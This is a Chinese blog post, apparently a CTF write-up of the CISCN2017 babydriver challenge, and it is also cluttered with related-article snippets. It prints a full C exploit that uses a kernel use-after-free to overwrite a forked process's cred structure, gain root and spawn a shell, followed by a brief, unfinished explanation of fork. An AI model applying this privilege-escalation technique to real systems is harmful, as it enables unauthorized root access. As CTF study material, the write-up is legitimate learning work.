Kernel内核第一道KernelUAF

最新推荐文章于 2023-09-29 13:42:02 发布
最新推荐文章于 2023-09-29 13:42:02 发布
阅读量149 收藏
点赞数
分类专栏: ctf pwn 新手 文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51687381/article/details/124232903
版权
新手 同时被 3 个专栏收录
23 篇文章 0 订阅
订阅专栏
ctf
15 篇文章 0 订阅
订阅专栏
pwn
11 篇文章 0 订阅
订阅专栏

CISCN2017 - babydriver

详细分析请移步kernel UAF - CTF Wiki,文章用作记录。

1.KVM问题:

KVM是虚拟化技术,有的机器可以通过bios中打开VT开启。但是我CPU i7-10875H并不支持。但这并不影响执行boot.sh启动Qume。只需要把boot.sh 中有关KVM那一行选项删掉即可。

2.exp分析:

CISCN2017_babydriver [master●●] cat exploit.c 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stropts.h>
#include <sys/wait.h>
#include <sys/stat.h>

int main()
{
    // 打开两次设备
    int fd1 = open("/dev/babydev", 2);
    int fd2 = open("/dev/babydev", 2);

    // 修改 babydev_struct.device_buf_len 为 sizeof(struct cred)
    ioctl(fd1, 0x10001, 0xa8);

    // 释放 fd1
    close(fd1);

    // 新起进程的 cred 空间会和刚刚释放的 babydev_struct 重叠
    int pid = fork();
    if(pid < 0)
    {
        puts("[*] fork error!");
        exit(0);
    }

    else if(pid == 0)
    {
        // 通过更改 fd2,修改新进程的 cred 的 uid,gid 等值为0
        char zeros[30] = {0};
        write(fd2, zeros, 28);

        if(getuid() == 0)
        {
            puts("[+] root now.");
            system("/bin/sh");
            exit(0);
        }
    }

    else
    {
        wait(NULL);
    }
    close(fd2);

    return 0;
}

首先是fork()函数。

fork(复刻)函数就是从fork这段代码开始,复刻一个相同的进程。而在kernel中,一个进程拥有一个cred(类似身份证的东西)这个会记录进程是否为root权限。然后利用libc中UAF的技术,加上多进程的思想就可以实现kernelUAF。

fork函数的返回值:

1.负值,fork失败。

2.0  ,

3.正值,

Hush^
关注
专栏目录
kernel_uaf
令则
02-14 366
kernel uaf 文章目录kernel uaf分析漏洞利用struct creduaf利用exp 分析 解包得到babydriver.ko文件, 这里其实有点奇怪,关于驱动文件我们要明白,他是常驻内核态的, 我们的程序打开这个文件描述符和读写关闭等操作会转入到这个驱动对应的函数内,我们编写用户态程序进行操作,其实是类似于我们直接去调用这些函数的。其中对应关系, 具体的关系一般要查看 data段的 file_operations, 这里说下一般遇到的常见命名方式。 open(“driver_name
Kernel内核库 5.5.0
01-05
1. linux-headers-5.5.0-050500rc4_5.5.0-050500rc4.201912291930_all.deb 2. linux-headers-5.5.0-050500rc4-generic_5.5.0-050500rc4.201912291930_amd64.deb 3. linux-image-unsigned-5.5.0-050500rc4-generic_...
Kernel pwn基础教学之Kernel UAF
蚁景网安学院
02-17 587
点击蓝字关注我们前言这边选择的例题还是baby driver,感觉做这道题的时候有种梦回第一道栈溢出题目的感觉。但是网上很多资料讲解本题时关于字符驱动这块并没有讲解,也就造成了我一开始做这...
linux kernel pwn学习之UAF
seaaseesa的博客
02-29 1385
Linux Kernel UAF 与用户态下的glibc差不多,都是对已经释放的空间未申请就直接使用,内核的UAF往往是出现在多线程多进程多文件的情况下。即,假如某个用户程序对用一个内核驱动文件打开了两次,有两个文件描述符,它们都指向了该驱动,又因为是在同一个程序里,所以当我们释放掉其中一个文件描述符后,还可以使用另一个文件描述符来操控驱动。 为了加深理解,我们就以一题为例 ciscn201...
linux内核申请堆,linux kernel pwn学习之UAF
weixin_29832179的博客
04-30 325
Linux Kernel UAF与用户态下的glibc差不多,都是对已经释放的空间未申请就直接使用,内核的UAF往往是出现在多线程多进程多文件的情况下。即,假如某个用户程序对用一个内核驱动文件打开了两次,有两个文件描述符,它们都指向了该驱动,又因为是在同一个程序里,所以当我们释放掉其中一个文件描述符后,还可以使用另一个文件描述符来操控驱动。为了加深理解,我们就以一题为例ciscn2017_baby...
【Writeup】CISCN2017_Pwn_babydriver
BAKUMANSEC - Just Do It
09-09 1978
0x01 环境配置 题目所给文件三个 boot.sh:启动脚本。多用qemu,保护措施与qemu不同的启动参数有关。 bzImage:kernel镜像。 rootfs.cpio:文件系统映像。 boot.sh内容 需要安装qemu,然后执行./boot.sh。 启动qemu虚拟机 显然本题需要进行内核提权,然后获得flag。 查看一下init文件内容 in...
centos7内核升级离线安装包kernel-lt-5.4.274*
最新发布
04-24
1. **下载内核包**:首先,你需要从可靠的源下载"kernel-lt-5.4.274*"的RPM包。由于是离线安装,你需要确保在有网络连接的环境中下载好所有必要的文件,包括kernel-lt、kernel-lt-devel和kernel-lt-headers等组件,...
linux kernel内核全景图
01-31
包含用户层,系统层,调度层,内存层,存储层,网络层等
CentOS7升级内核kernel5.0版本
09-14
主要介绍了CentOS7升级内核kernel5.0版本,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
centos-6.8 内核升级kernel-3.18版本rpm包分享
11-08
升级内核版本主要解决docker无法运行的问题,centos6.8默认的内核是2.6,升级到3.18同时做个记录。 下载指定版本 kernel: http://rpm.pbone.net/index.php3?stat=3&limit=1&srodzaj=3&dl=40&search=kernel 下载指定...
kernel-pwn】一题多解:从CISCN2017-babydriver入门题带你学习tty_struct、seq_file、msg_msg、pt_regs的利用
qq_61670993的博客
09-29 387
kernel pwn 入门
linux内核漏洞 2017,【Linux内核漏洞利用】CISCN2017-babydriver_过SMEP
weixin_39655689的博客
05-02 186
一、代码分析://babyioctl:定义了 0x10001 的命令,可以释放全局变量 babydev_struct 中的 device_buf,再根据用户传递的 size 重新申请一块内存,并设置 device_buf_len。void __fastcall babyioctl(file *filp, unsigned int command, unsigned __int64 arg){siz...
CISCN 2017 babydriver uaf做法
weixin_46483787的博客
04-12 1603
本来是在学IOT和fuzz,但是比赛中经常出现kernel题,我们又没人会做,没有办法只好我来学了·····(一万个抗拒) 这可能是大部分人的第一道kernel题吧hhhhh 虽然在新的内核版本中此文的UAF做法已经失效,但是对于初学者来说,此题非常适合理解kernel题目的攻击流程 拿到题目先解压,提取文件系统: mkdir rootfs mv rootfs.cpio ./rootfs/rootfs.cpio.gz cd rootfs gunzip rootfs.cpio.gz cpio -idmv &l
CISCN 2017 babydriver ROP做法
weixin_46483787的博客
04-14 393
具体题目分析请看 CISCN 2017 babydriver uaf做法 UAF这种做法在新版内核中已经不生效了,因为新进程的cred结构体会有一个单独的区域进行申请。 这里介绍另一种ROP的做法 首先要知道一些前置的知识 当用open打开/dev/ptmx的时候,会创建一个tty_struct 长这样: struct tty_struct { int magic; struct kref kref; struct device *dev;
Linux: 记一次内核 UAF 问题解决过程
JiMoKuangXiangQu的专栏
07-15 1175
linux, 调试, UAF(Use After Free)
第一道 kernel pwn 题 CISCN2017 - babydriver
qq_41071646的博客
07-13 1023
搞定 环境之后 一切就很简单了起来 (起码做题自闭 总比 环境自闭好多了) 然后 参考链接是 wiki https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/kernel_uaf-zh/ 至于 题目 wiki上都给好了 我们直接看驱动吧 这个题目确实是baby 没有任何的防护措施 而且符号表也没有 去掉 在很大程度上 把这个题简单...
linux kernel pwn --- ciscn2017_babydriver
abelxu
03-19 475
在学习完ctfwiki上关于linux kernel pwn后在github上找了一些以前的题目来练习巩固学到的内容。 0x01查看题目 1.查看启动脚本boot.sh,启动了smep,不能执行用户空间代码 #!/bin/bash qemu-system-x86_64 -initrd rootfs.cpio -kernel bzImage -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' -monitor /dev/null -m 64M --
内核pwn入门之ciscn2017_babydrive UAF
qq_39948058的博客
08-28 590
前言:第一次入手内核题,全靠fmyy师傅博客的复现,复现完后,大致对uaf在内核的利用有了大概的理解。 解题步骤: 1.简短话语进行写博客吧,题目给了我们一个压缩包,把它解压,发现没有vmlinux,所以这里采用extract-vmlinux来进行提取vmlinux,为什么要提取这个文件,因为后期我们如果用到调试的时候需要调试这个文件 ./extract-vmlinux ./bzImage > vmlinux #!/bin/sh # SPDX-License-Identifier: GPL-2.0
linux_kernel_uaf漏洞利用实战
weixin_30666753的博客
08-03 431
前言 好像是国赛的一道题。一个 linux 的内核题目。漏洞比较简单,可以作为入门。 题目链接: 在这里 正文 题目给了3个文件 分配是 根文件系统 , 内核镜像, 启动脚本。解压运行 boot.sh 即可。 vmware 需要开启一个选项。 使用 lsmod 可以找到加载的内核模块,以及它的加载地址。 多次启动发现,地址都没有变化,说明没有开启 kaslr ,从 boot.sh 中查看 q...
Linux Kernel内核深入指南:硬件篇与个人电脑起源
第一章"Hardware Basic"阐述了硬件对操作系统的重要性,指出操作系统依赖于硬件提供的特定功能,如Intel 8080处理器和早期PC(如Altair 8080)的发展历程,这些早期的个人电脑虽然简陋,却标志着个人计算机时代的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值